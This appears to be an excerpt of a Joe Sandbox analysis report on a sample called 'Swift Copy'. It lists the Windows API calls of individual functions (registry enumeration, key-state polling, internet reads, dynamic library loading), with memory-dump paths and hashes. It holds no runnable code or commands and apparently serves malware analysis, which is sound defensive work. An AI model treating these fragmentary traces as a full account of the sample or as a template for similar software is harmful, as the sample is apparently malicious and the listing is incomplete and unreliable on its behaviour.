                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFBAA5
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFBB00
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DFBB63
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00DFBBA6
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFBBB3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                              • String ID:
                                              • API String ID: 826366716-0
                                              • Opcode ID: b5b8029c6d2e8edf1cf7d3f04896e70b85c2f2a685ce73704d84b8c360551835
                                              • Instruction ID: 9cf3ba8e3c927599166ee7151a46e5f950d2edce8fdadc9e60a1d444de7b5fd6
                                              • Opcode Fuzzy Hash: b5b8029c6d2e8edf1cf7d3f04896e70b85c2f2a685ce73704d84b8c360551835
                                              • Instruction Fuzzy Hash: 54618B31208205AFD714DF14C890E2ABBE5FF84318F59C95DF5998B2A2DB31ED45CBA2
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00DD8BCD
                                              • VariantClear.OLEAUT32 ref: 00DD8C3E
                                              • VariantClear.OLEAUT32 ref: 00DD8C9D
                                              • VariantClear.OLEAUT32(?), ref: 00DD8D10
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DD8D3B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType
                                              • String ID:
                                              • API String ID: 4136290138-0
                                              • Opcode ID: 82d7e54c2b952c00856bd12807b40a4c1719c562e3179c312cdeb9a0bf388059
                                              • Instruction ID: 31f71b9f42a74941c0da1113b583b62c596178e0876d0d1d6b1ecf3fb421755c
                                              • Opcode Fuzzy Hash: 82d7e54c2b952c00856bd12807b40a4c1719c562e3179c312cdeb9a0bf388059
                                              • Instruction Fuzzy Hash: 25517CB5A00219EFCB14CF69C884AAAB7F9FF89310B15855AF915DB350E730E911CFA0
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DE8BAE
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DE8BDA
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DE8C32
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DE8C57
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DE8C5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String
                                              • String ID:
                                              • API String ID: 2832842796-0
                                              • Opcode ID: cfc6ce48d65d9d7693af81a26770bb0b419709fa984eef014bb4b033563bd033
                                              • Instruction ID: 19740c85e3923673e32527a0c5cf7024b072977d3ff7f06ffb6a61d56de54367
                                              • Opcode Fuzzy Hash: cfc6ce48d65d9d7693af81a26770bb0b419709fa984eef014bb4b033563bd033
                                              • Instruction Fuzzy Hash: 35514835A00214AFCB05EF65C881A6DBBF5FF49314F18C458E849AB362DB31ED51DBA1
                                              APIs
                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DF8F40
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00DF8FD0
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DF8FEC
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00DF9032
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DF9052
                                                • Part of subcall function 00D8F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DE1043,?,753CE610), ref: 00D8F6E6
                                                • Part of subcall function 00D8F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DCFA64,00000000,00000000,?,?,00DE1043,?,753CE610,?,00DCFA64), ref: 00D8F70D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                              • String ID:
                                              • API String ID: 666041331-0
                                              • Opcode ID: f3f6f325532ed0dba8d314051126d5a8cd30f122612720714501b340a2a522f4
                                              • Instruction ID: 69d1d70171ad1aff886a5f722aa7694b9fef2d6c8ffc6476fe4805d4afc423c5
                                              • Opcode Fuzzy Hash: f3f6f325532ed0dba8d314051126d5a8cd30f122612720714501b340a2a522f4
                                              • Instruction Fuzzy Hash: B6516C35A01209DFC701DF58C4949ADBBF1FF49324B09C199E90AAB362DB31ED85CBA1
                                              APIs
                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E06C33
                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00E06C4A
                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E06C73
                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DEAB79,00000000,00000000), ref: 00E06C98
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E06CC7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Long$MessageSendShow
                                              • String ID:
                                              • API String ID: 3688381893-0
                                              • Opcode ID: 8ce9b522106ce36b357b7612b1b2321d0ef6a3a21bfcc5e43da2d1f4cfd87827
                                              • Instruction ID: 9a114a3d04072217cf80ae99a9d57e627772fb9344c427265d265f53d3074369
                                              • Opcode Fuzzy Hash: 8ce9b522106ce36b357b7612b1b2321d0ef6a3a21bfcc5e43da2d1f4cfd87827
                                              • Instruction Fuzzy Hash: D0410635A00104AFEB24CF69CC98FA9BBA4EB49354F141268F995B72E0C371EDE1CA50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 3e494f626ac7851bd9daa6b0e3169f1f2ca214470fb0b76da57a030484b52f4c
                                              • Instruction ID: b68bf111bcf8e40d8fdbd4f4fd740ed4fefbc10b2a18847acb0032d784d5a1dd
                                              • Opcode Fuzzy Hash: 3e494f626ac7851bd9daa6b0e3169f1f2ca214470fb0b76da57a030484b52f4c
                                              • Instruction Fuzzy Hash: E341D172A002049FCB24DF7EC881A6EB7F5EF8A314B194569E515EB351D731ED01CBA1
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00D89141
                                              • ScreenToClient.USER32(00000000,?), ref: 00D8915E
                                              • GetAsyncKeyState.USER32(00000001), ref: 00D89183
                                              • GetAsyncKeyState.USER32(00000002), ref: 00D8919D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: ac46a7b7c3757b5e77c8ecdd2a6c3c2842b726e775d9a3929c36bd7709d39354
                                              • Instruction ID: 5d00a6e0fbe65a34456523a3662950f7e00c6837a053ff43d9b375af5e6e3dfd
                                              • Opcode Fuzzy Hash: ac46a7b7c3757b5e77c8ecdd2a6c3c2842b726e775d9a3929c36bd7709d39354
                                              • Instruction Fuzzy Hash: 09414D71A0860BBBDB15AF64C858BFEF7B4FB05324F284219E469A32D0C7305994CF61
                                              APIs
                                              • GetInputState.USER32 ref: 00DE38CB
                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DE3922
                                              • TranslateMessage.USER32(?), ref: 00DE394B
                                              • DispatchMessageW.USER32(?), ref: 00DE3955
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE3966
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                              • String ID:
                                              • API String ID: 2256411358-0
                                              • Opcode ID: 1c66a784bb501120044433764cd88ffa3b2f974099eb347494cc80f8a5c67f19
                                              • Instruction ID: 8e14873c02f75c9b66dce667bcc004eb0fcc1a7ea00186e757b6c8067fc6716b
                                              • Opcode Fuzzy Hash: 1c66a784bb501120044433764cd88ffa3b2f974099eb347494cc80f8a5c67f19
                                              • Instruction Fuzzy Hash: 7B31A5745043C19EEF35EB379C4DBB637A8AB46304F180559E452A3091E3A596C9CF31
                                              APIs
                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00DECF38
                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 00DECF6F
                                              • GetLastError.KERNEL32(?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFB4
                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFC8
                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DEC21E,00000000), ref: 00DECFF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                              • String ID:
                                              • API String ID: 3191363074-0
                                              • Opcode ID: 72e9a67defac5b006e4ac1e5516ec192f02aa178dadc1fd3aab372a2e87706ed
                                              • Instruction ID: 3adc5fd8e1c5620ce1e5b6bd2c608e7a4546e84a5122e6b53c0fcda07daf4f9f
                                              • Opcode Fuzzy Hash: 72e9a67defac5b006e4ac1e5516ec192f02aa178dadc1fd3aab372a2e87706ed
                                              • Instruction Fuzzy Hash: 7C317C71615645EFDB20EFA6C884AABBBF9EF04315B24442EF546E2110DB30EE469B70
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00DD1915
                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DD19C1
                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00DD19C9
                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DD19DA
                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DD19E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                              • Instruction ID: 10d01df5e9b39fca8e8eac3ed05f6140c501912faf25253cb3aca042eaf37054
                                              • Opcode Fuzzy Hash: 5a58f896a117b2b0e1c6400d70985469bb0a8f5c694f1718a4615a36f51dba62
                                              • Instruction Fuzzy Hash: 3131AD75A00219EFCB10CFA8D9A9ADE3BB5EB04315F14432AF961A72D1C770A944CFA1
                                              APIs
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E05745
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E0579D
                                              • _wcslen.LIBCMT ref: 00E057AF
                                              • _wcslen.LIBCMT ref: 00E057BA
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E05816
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$_wcslen
                                              • String ID:
                                              • API String ID: 763830540-0
                                              • Opcode ID: 84639ec7b136dd56979e106584935e8fbc4edd012b2c11e0045254baee25475a
                                              • Instruction ID: 1604d9476166af1f5f399116128baf82fa31f0fd6fb8091b48d0cbbe2d13a46b
                                              • Opcode Fuzzy Hash: 84639ec7b136dd56979e106584935e8fbc4edd012b2c11e0045254baee25475a
                                              • Instruction Fuzzy Hash: 14218F36904618EADF208FA0DC84AEE77B8FF44724F109216E929BA1C0E77089C5CF61
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00DF0951
                                              • GetForegroundWindow.USER32 ref: 00DF0968
                                              • GetDC.USER32(00000000), ref: 00DF09A4
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00DF09B0
                                              • ReleaseDC.USER32(00000000,00000003), ref: 00DF09E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: fdba4f16e60bfdb8f94a553f7f40597557e023fef3c919c3ff1f026dba040308
                                              • Instruction ID: e36b53110bd9ed318a2d33169a0b208c547aeedbac9b3c732e0c872f8e52f282
                                              • Opcode Fuzzy Hash: fdba4f16e60bfdb8f94a553f7f40597557e023fef3c919c3ff1f026dba040308
                                              • Instruction Fuzzy Hash: 19218135600204AFD714EF65D885AAEBBF5EF48704F148169F94AA7362DB71AC44CBA0
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 00DACDC6
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DACDE9
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444,?,00D8FDF5,?,?,00D7A976,00000010,00E41440,00D713FC,?,00D713C6,?,00D71129), ref: 00DA3852
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DACE0F
                                              • _free.LIBCMT ref: 00DACE22
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DACE31
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 7a4263831ac30ad41030af2193f81e5d137625d44ec2dc22200480757b116b35
                                              • Instruction ID: f0b5190b18b11cb462a7dd3a53feee2ffecffc0353f06f81ec6a12b20e186583
                                              • Opcode Fuzzy Hash: 7a4263831ac30ad41030af2193f81e5d137625d44ec2dc22200480757b116b35
                                              • Instruction Fuzzy Hash: 800147726122107F672117BB6C8CD3B796DDFC7BB03281229FD00E3200EA218E0181F1
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                              • SelectObject.GDI32(?,00000000), ref: 00D896A2
                                              • BeginPath.GDI32(?), ref: 00D896B9
                                              • SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
